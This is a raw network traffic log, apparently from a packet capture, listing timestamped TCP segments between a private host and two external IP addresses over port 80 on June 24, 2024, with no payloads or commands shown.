Jun 24, 2024 00:10:21.279977083 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280009031 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280010939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280021906 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280030012 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280088902 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280296087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280308962 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280320883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280344963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280374050 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280389071 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280400991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280411959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280424118 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280623913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280638933 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280647039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280647039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280649900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280662060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280664921 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280673027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280683994 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.280714989 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.280749083 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282563925 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282576084 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282588005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282598972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282609940 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282614946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282624006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282634020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282644033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282655954 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282665968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282666922 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282676935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282689095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282691002 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282700062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282711983 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282717943 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282717943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282726049 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282736063 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282742023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282742977 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282752991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282763958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282776117 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282783985 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282787085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282798052 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282808065 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282819986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282824993 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.282831907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.282851934 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283000946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283099890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283143044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283154011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283184052 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283200026 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283220053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283231020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283269882 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283343077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283354998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283365011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283375978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283382893 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283386946 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283430099 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283503056 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283514023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283524990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.283544064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.283577919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.284039974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.284109116 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.288011074 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.288022995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.288039923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.288050890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.288072109 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.288100958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.288110971 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.288111925 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.288145065 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.288415909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288425922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288491011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.288491011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.288552046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288570881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288621902 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.288645029 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.288676023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288686991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288697004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288722992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288729906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.288736105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.288798094 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.288830996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289227962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289277077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289299965 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289309978 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289321899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289323092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289350033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289350033 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289371967 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289386988 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289761066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289772987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289788961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289799929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289828062 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289849997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289851904 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289861917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289871931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.289913893 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.289932966 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.290472031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290482998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290493011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290529013 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.290544987 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.290553093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290564060 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290575981 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290611982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290622950 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.290647984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.290647984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.290678978 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.291443110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291455030 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291465044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291485071 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291515112 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.291533947 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.291539907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291551113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291580915 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291583061 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.291593075 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.291647911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.291666031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.292398930 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292409897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292421103 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292464972 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.292489052 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292504072 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292509079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292511940 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.292521000 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292562962 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.292577028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.292594910 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.292608976 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.365438938 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365498066 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365509987 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365521908 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365533113 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365595102 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365675926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365691900 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365722895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365725040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365736961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365758896 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365767002 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365772009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365788937 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365823030 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365930080 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365942001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365952969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365972996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.365973949 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.365989923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.366000891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.366012096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.366023064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.366067886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.377295971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.377425909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.377496958 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384315014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384354115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384363890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384434938 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384476900 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384591103 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384603024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384613991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384625912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384637117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384644032 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384675980 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384699106 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384705067 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384717941 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384759903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384759903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384773016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384784937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384804010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384815931 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384859085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.384860039 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384893894 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.384910107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385185957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385204077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385215044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385246992 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385277987 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385287046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385298967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385309935 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385323048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385344982 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385379076 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385395050 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385407925 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385451078 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385845900 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385857105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385868073 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385915041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385916948 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385927916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385938883 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.385968924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.385987043 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386061907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386073112 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386084080 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386096001 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386107922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386117935 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386187077 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386198997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386209011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386245966 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386701107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386723995 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386734962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386766911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386802912 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386838913 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386851072 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386861086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386872053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.386892080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.386926889 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387006998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387023926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387036085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387047052 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387058020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387068987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387099981 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387128115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387644053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387711048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387721062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387762070 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387810946 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387823105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387833118 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387844086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387861013 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387885094 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387909889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387919903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.387948036 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387985945 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.387996912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388008118 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388019085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388031960 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388046026 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.388081074 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.388875961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388894081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388904095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388914108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388925076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388933897 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.388935089 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388947964 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388956070 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.388959885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388971090 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.388978958 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.389007092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.389023066 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.404851913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.404887915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.404897928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.404961109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.404970884 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405045033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405050993 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405050993 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405050993 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405067921 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405078888 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405088902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405098915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405112982 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405162096 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405505896 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405515909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405527115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405550957 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405579090 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405580997 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405590057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405600071 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405623913 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405662060 CEST	49725	80	192.168.2.5	77.91.77.81
